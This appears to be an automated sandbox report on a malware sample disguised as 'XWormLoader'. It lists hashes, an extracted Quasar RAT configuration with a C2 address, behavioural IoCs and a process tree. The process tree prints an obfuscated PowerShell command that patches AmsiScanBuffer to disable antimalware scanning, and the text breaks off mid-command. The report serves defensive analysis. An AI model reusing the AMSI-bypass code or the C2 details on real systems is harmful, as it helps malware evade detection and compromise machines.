Analysis
- max time kernel: 150s
- max time network: 145s
- platform: windows11-21h2_x64
- resource: win11-20240426-en
- resource tags: arch:x64, arch:x86, image:win11-20240426-en, locale:en-us, os:windows11-21h2-x64, system
- submitted: 03-05-2024 17:47
Static task: static1
Behavioral task: behavioral1
- Sample: XWormLoader 5.2 x64.exe
- Resource: win10-20240404-en
Behavioral task: behavioral2
- Sample: XWormLoader 5.2 x64.exe
- Resource: win10v2004-20240419-en
General
- Target: XWormLoader 5.2 x64.exe
- Size: 329KB
- MD5: 893ee266eef0ca3b11bdb859839df69d
- SHA1: 1d2eeab0c7ae7e9ec180017d8092f23abbea6d2b
- SHA256: 40c49ccfb00bd4ca02d587af4f03823650dde39b5fe31dcde8bbdc3fa508bea3
- SHA512: 694843c573f2aeec876eaa0ef329268553cde23cc4fdced9371041c3df097eec00b44894423ee00a7c9a1444f0bb17a089cb48c5430dfdaafa1265e5cd1b85f5
- SSDEEP: 6144:HfPtIkJwV7LtIgxfUFdLdassJFxgXS+vK5Qav9qm:HflXJwFmmUFdLs9H51
Malware Config
Extracted
- Family: quasar
- Version: 3.1.5
- Botnet: SLAVE
- C2: even-lemon.gl.at.ply.gg:33587
- Mutex: $Sxr-3vDee7FzoJnhqjuE3n
- encryption_key: AqYe7s30CMq7SVM0oxKR
- install_name: Discord.exe
- log_directory: Logs
- reconnect_delay: 1000
- startup_key: Discord
- subdirectory: Discord
Signatures
Quasar payload 2 IoCs
Processes:
  resource | yara_rule
  C:\Users\Admin\AppData\Local\Temp\svchost.exe | family_quasar
  behavioral3/memory/3604-26-0x0000000000750000-0x00000000007BC000-memory.dmp | family_quasar
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
Processes:
  description | pid | process | target process
  PID 4652 created 3592 | 4652 | WerFault.exe | cmd.exe
  PID 2552 created 3592 | 2552 | WerFault.exe | cmd.exe
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
Processes:
  description | pid | process | target process
  PID 1612 created 640 | 1612 | powershell.EXE | winlogon.exe
  PID 2624 created 3592 | 2624 | svchost.exe | cmd.exe
  PID 2624 created 3592 | 2624 | svchost.exe | cmd.exe
  PID 2688 created 640 | 2688 | powershell.EXE | winlogon.exe
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
  description | ioc | process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | wmiprvse.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | wmiprvse.exe
Executes dropped EXE 5 IoCs
Processes:
  pid | process
  3604 | svchost.exe
  4492 | XWormLoader 5.2 x32.exe
  396 | Discord.exe
  2336 | install.exe
  4616 | install.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
Processes:
  flow | ioc
  1 | raw.githubusercontent.com
  6 | raw.githubusercontent.com
  10 | raw.githubusercontent.com
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
  flow | ioc
  1 | ip-api.com
Drops file in System32 directory 9 IoCs
Processes:
  description | ioc | process
  File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | svchost.exe
  File opened for modification | C:\Windows\System32\Tasks\$77Discord.exe | svchost.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | OfficeClickToRun.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | powershell.EXE
  File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | svchost.exe
  File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx | svchost.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
  File opened for modification | C:\Windows\System32\Tasks\$77svc64 | svchost.exe
Suspicious use of SetThreadContext 2 IoCs
Processes:
  description | pid | process | target process
  PID 1612 set thread context of 2356 | 1612 | powershell.EXE | dllhost.exe
  PID 2688 set thread context of 4872 | 2688 | powershell.EXE | dllhost.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Program crash 3 IoCs
Processes:
  pid | pid_target | process | target process
  2388 | 4492 | WerFault.exe | XWormLoader 5.2 x32.exe
  3332 | 3592 | WerFault.exe | cmd.exe
  3792 | 3592 | WerFault.exe | cmd.exe
Checks processor information in registry 2 TTPs 14 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
  description | ioc | process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | WerFault.exe
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | WerFault.exe
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | WerFault.exe
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
  pid | process
  4740 | schtasks.exe
  1044 | SCHTASKS.exe
  4480 | schtasks.exe
  1952 | SCHTASKS.exe
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Modifies data under HKEY_USERS 64 IoCs
Processes:
  description | ioc | process
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | powershell.EXE
  Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={7133246C-BE95-441E-A4F9-31577D6A28C5}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" | OfficeClickToRun.exe
  Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | OfficeClickToRun.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.EXE
  Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | OfficeClickToRun.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.EXE
  Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | OfficeClickToRun.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.EXE
  Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Fri, 03 May 2024 17:49:32 GMT" | OfficeClickToRun.exe
  Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 50,1329 10,1329 15,1329 100,1329 6" | OfficeClickToRun.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | OfficeClickToRun.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | OfficeClickToRun.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry | OfficeClickToRun.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | powershell.EXE
Runs ping.exe 1 TTPs 1 IoCs
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
  pid | process (×N = the row is repeated N times in sequence)
  1612 | powershell.EXE (×3)
  2356 | dllhost.exe (×10)
  396 | Discord.exe
  2356 | dllhost.exe (×6)
  3084 | wmiprvse.exe
  2356 | dllhost.exe (×10)
  396 | Discord.exe
  2356 | dllhost.exe (×10)
  396 | Discord.exe
  2356 | dllhost.exe (×10)
  396 | Discord.exe
  2356 | dllhost.exe (×10)
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
  description | pid | process (×N = the row occurs N times)
  Token: SeDebugPrivilege | 3604 | svchost.exe
  Token: SeDebugPrivilege | 396 | Discord.exe
  Token: SeDebugPrivilege | 1612 | powershell.EXE (×2)
  Token: SeDebugPrivilege | 2356 | dllhost.exe
  Token: SeAssignPrimaryTokenPrivilege | 2664 | svchost.exe (×5)
  Token: SeIncreaseQuotaPrivilege | 2664 | svchost.exe (×5)
  Token: SeSecurityPrivilege | 2664 | svchost.exe (×5)
  Token: SeTakeOwnershipPrivilege | 2664 | svchost.exe (×5)
  Token: SeLoadDriverPrivilege | 2664 | svchost.exe (×5)
  Token: SeSystemtimePrivilege | 2664 | svchost.exe (×5)
  Token: SeBackupPrivilege | 2664 | svchost.exe (×5)
  Token: SeRestorePrivilege | 2664 | svchost.exe (×5)
  Token: SeShutdownPrivilege | 2664 | svchost.exe (×5)
  Token: SeSystemEnvironmentPrivilege | 2664 | svchost.exe (×5)
  Token: SeUndockPrivilege | 2664 | svchost.exe (×5)
  Token: SeManageVolumePrivilege | 2664 | svchost.exe (×4)
Suspicious use of UnmapMainImage 2 IoCs
Processes:
  pid | process
  3340 | Explorer.EXE
  3884 | RuntimeBroker.exe
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
  description | pid | process | target process (×N = the row is repeated N times in sequence)
  PID 1368 wrote to memory of 3604 | 1368 | XWormLoader 5.2 x64.exe | svchost.exe (×3)
  PID 1368 wrote to memory of 4492 | 1368 | XWormLoader 5.2 x64.exe | XWormLoader 5.2 x32.exe (×3)
  PID 3604 wrote to memory of 4480 | 3604 | svchost.exe | schtasks.exe (×3)
  PID 3604 wrote to memory of 396 | 3604 | svchost.exe | Discord.exe (×3)
  PID 3604 wrote to memory of 2336 | 3604 | svchost.exe | install.exe (×3)
  PID 3604 wrote to memory of 1952 | 3604 | svchost.exe | SCHTASKS.exe (×3)
  PID 396 wrote to memory of 4740 | 396 | Discord.exe | schtasks.exe (×3)
  PID 1612 wrote to memory of 2356 | 1612 | powershell.EXE | dllhost.exe (×8)
  PID 2356 wrote to memory of 640 | 2356 | dllhost.exe | winlogon.exe
  PID 2356 wrote to memory of 708 | 2356 | dllhost.exe | lsass.exe
  PID 2356 wrote to memory of 996 | 2356 | dllhost.exe | svchost.exe
  PID 2356 wrote to memory of 420 | 2356 | dllhost.exe | dwm.exe
  PID 2356 wrote to memory of 456 | 2356 | dllhost.exe | svchost.exe
  PID 2356 wrote to memory of 764 | 2356 | dllhost.exe | svchost.exe
  PID 2356 wrote to memory of 1076 | 2356 | dllhost.exe | svchost.exe
  PID 2356 wrote to memory of 1084 | 2356 | dllhost.exe | svchost.exe
  PID 2356 wrote to memory of 1164 | 2356 | dllhost.exe | svchost.exe
  PID 2356 wrote to memory of 1172 | 2356 | dllhost.exe | svchost.exe
  PID 2356 wrote to memory of 1272 | 2356 | dllhost.exe | svchost.exe
  PID 2356 wrote to memory of 1292 | 2356 | dllhost.exe | svchost.exe
  PID 2356 wrote to memory of 1400 | 2356 | dllhost.exe | svchost.exe
  PID 2356 wrote to memory of 1476 | 2356 | dllhost.exe | svchost.exe
  PID 2356 wrote to memory of 1496 | 2356 | dllhost.exe | svchost.exe
  PID 2356 wrote to memory of 1572 | 2356 | dllhost.exe | svchost.exe
  PID 2356 wrote to memory of 1596 | 2356 | dllhost.exe | svchost.exe
  PID 2356 wrote to memory of 1712 | 2356 | dllhost.exe | svchost.exe
  PID 2356 wrote to memory of 1728 | 2356 | dllhost.exe | svchost.exe
  PID 2356 wrote to memory of 1748 | 2356 | dllhost.exe | svchost.exe
  PID 2356 wrote to memory of 1828 | 2356 | dllhost.exe | svchost.exe
  PID 2356 wrote to memory of 1872 | 2356 | dllhost.exe | svchost.exe
  PID 2356 wrote to memory of 1884 | 2356 | dllhost.exe | svchost.exe
  PID 2356 wrote to memory of 1904 | 2356 | dllhost.exe | svchost.exe
  PID 2356 wrote to memory of 2004 | 2356 | dllhost.exe | svchost.exe
  PID 2356 wrote to memory of 1256 | 2356 | dllhost.exe | svchost.exe
  PID 2356 wrote to memory of 2096 | 2356 | dllhost.exe | spoolsv.exe
  PID 2356 wrote to memory of 2232 | 2356 | dllhost.exe | svchost.exe
  PID 2356 wrote to memory of 2408 | 2356 | dllhost.exe | svchost.exe
  PID 2356 wrote to memory of 2416 | 2356 | dllhost.exe | svchost.exe
  PID 2356 wrote to memory of 2472 | 2356 | dllhost.exe | svchost.exe
  PID 2356 wrote to memory of 2524 | 2356 | dllhost.exe | svchost.exe
  PID 2356 wrote to memory of 2596 | 2356 | dllhost.exe | svchost.exe
  PID 2356 wrote to memory of 2616 | 2356 | dllhost.exe | sysmon.exe
  PID 2356 wrote to memory of 2652 | 2356 | dllhost.exe | svchost.exe
Processes
- C:\Windows\system32\winlogon.exe
  command line: winlogon.exe
  - C:\Windows\system32\dwm.exe
    command line: "dwm.exe"
  - C:\Windows\System32\dllhost.exe
    command line: C:\Windows\System32\dllhost.exe /Processid:{9edf36f4-8ff6-4cd5-b545-07bbffea0ba1}
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\dllhost.exe
    command line: C:\Windows\System32\dllhost.exe /Processid:{70442150-baf2-4258-b143-d39f18318265}
- C:\Windows\system32\lsass.exe
  command line: C:\Windows\system32\lsass.exe
- C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
- C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
- C:\Windows\System32\svchost.exe
  command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
- C:\Windows\System32\svchost.exe
  command line: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
- C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
- C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
  - Drops file in System32 directory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
    command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:XKnSftNraHzw{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$wQRKUtcFbwhIsT,[Parameter(Position=1)][Type]$SGlyOqrFPf)$LaJSxrnlxpL=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+'t'+'e'+''+[Char](100)+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+'e'+''+'m'+''+'o'+'r'+[Char](121)+'M'+[Char](111)+''+[Char](100)+''+'u'+''+'l'+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+'e'+''+'l'+''+[Char](101)+'g'+'a'+''+'t'+''+[Char](101)+'T'+'y'+''+[Char](112)+''+[Char](101)+'','C'+'l'+''+[Char](97)+'s'+[Char](115)+','+'P'+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+'S'+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+',A'+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+''+'l'+''+[Char](97)+'s'+[Char](115)+''+[Char](44)+''+[Char](65)+'u'+'t'+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+'a'+''+'s'+''+'s'+'',[MulticastDelegate]);$LaJSxrnlxpL.DefineConstructor('R'+[Char](84)+'S'+'p'+''+[Char](101)+'c'+'i'+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+'y'+''+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$wQRKUtcFbwhIsT).SetImplementationFlags(''+'R'+''+'u'+'n'+'t'+''+'i'+''+'m'+'e,'+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+'e'+'d');$LaJSxrnlxpL.DefineMethod('I'+'n'+''+'v'+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+'u'+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+',H'+[Char](105)+'d'+[Char](101)+''+'B'+''+'y'+''+'S'+''+'i'+''+'g'+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+'w'+'S'+[Char](108)+''+'o'+''+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+'t'+'u'+''+'a'+''+'l'+'',$SGlyOqrFPf,$wQRKUtcFbwhIsT).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+'i'+'m'+''+[Char](101)+''+[Char](44)+''+'M'+'a'+[Char](110)+'a'+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $LaJSxrnlxpL.CreateType();}$nuiIxRcZpRTVn=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+''+'s'+''+'t'+''+'e'+'m.'+[Char](100)+'l'+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+''+'r'+'o'+[Char](115)+''+'o'+'f'+[Char](116)+'.'+[Char](87)+''+[Char](105)+''+'n'+'3'+[Char](50)+''+[Char](46)+''+[Char](85)+''+'n'+''+'s'+'af'+[Char](101)+''+'N'+''+'a'+''+[Char](116)+''+[Char](105)+'v'+[Char](101)+''+[Char](77)+'e'+'t'+''+[Char](104)+''+'o'+'ds');$HCvJfvstKGVxzk=$nuiIxRcZpRTVn.GetMethod('Get'+[Char](80)+'r'+'o'+''+[Char](99)+''+'A'+''+[Char](100)+'d'+[Char](114)+''+'e'+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+''+','+'S'+[Char](116)+''+[Char](97)+''+[Char](116)+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$yQmYBCNmLyMqauQBXbq=XKnSftNraHzw @([String])([IntPtr]);$dzigsBsmLSAhHhqNqxOrKv=XKnSftNraHzw @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$rjJqOCeTVAS=$nuiIxRcZpRTVn.GetMethod(''+[Char](71)+'e'+[Char](116)+''+'M'+''+[Char](111)+''+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'H'+[Char](97)+'n'+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object](''+'k'+'e'+[Char](114)+'n'+[Char](101)+''+[Char](108)+''+[Char](51)+'2'+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')));$EfnpToWseRKoHZ=$HCvJfvstKGVxzk.Invoke($Null,@([Object]$rjJqOCeTVAS,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+'d'+''+[Char](76)+''+[Char](105)+''+'b'+''+'r'+''+'a'+'ryA')));$SnpphpTJMhjyWrkUp=$HCvJfvstKGVxzk.Invoke($Null,@([Object]$rjJqOCeTVAS,[Object]('V'+'i'+'r'+[Char](116)+''+[Char](117)+''+'a'+''+[Char](108)+''+'P'+''+[Char](114)+''+[Char](111)+''+'t'+''+'e'+''+'c'+'t')));$OFjNWEJ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EfnpToWseRKoHZ,$yQmYBCNmLyMqauQBXbq).Invoke('a'+[Char](109)+'s'+'i'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$HIwVOszMPDtyLrIiX=$HCvJfvstKGVxzk.Invoke($Null,@([Object]$OFjNWEJ,[Object](''+[Char](65)+'m'+[Char](115)+''+'i'+''+[Char](83)+''+'c'+''+'a'+''+'n'+'Bu'+[Char](102)+''+'f'+''+[Char](101)+'r')));$KfifdtTYcK=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SnpphpTJMhjyWrkUp,$dzigsBsmLSAhHhqNqxOrKv).Invoke($HIwVOszMPDtyLrIiX,[uint32]8,4,[ref]$KfifdtTYcK);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$HIwVOszMPDtyLrIiX,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SnpphpTJMhjyWrkUp,$dzigsBsmLSAhHhqNqxOrKv).Invoke($HIwVOszMPDtyLrIiX,[uint32]8,0x2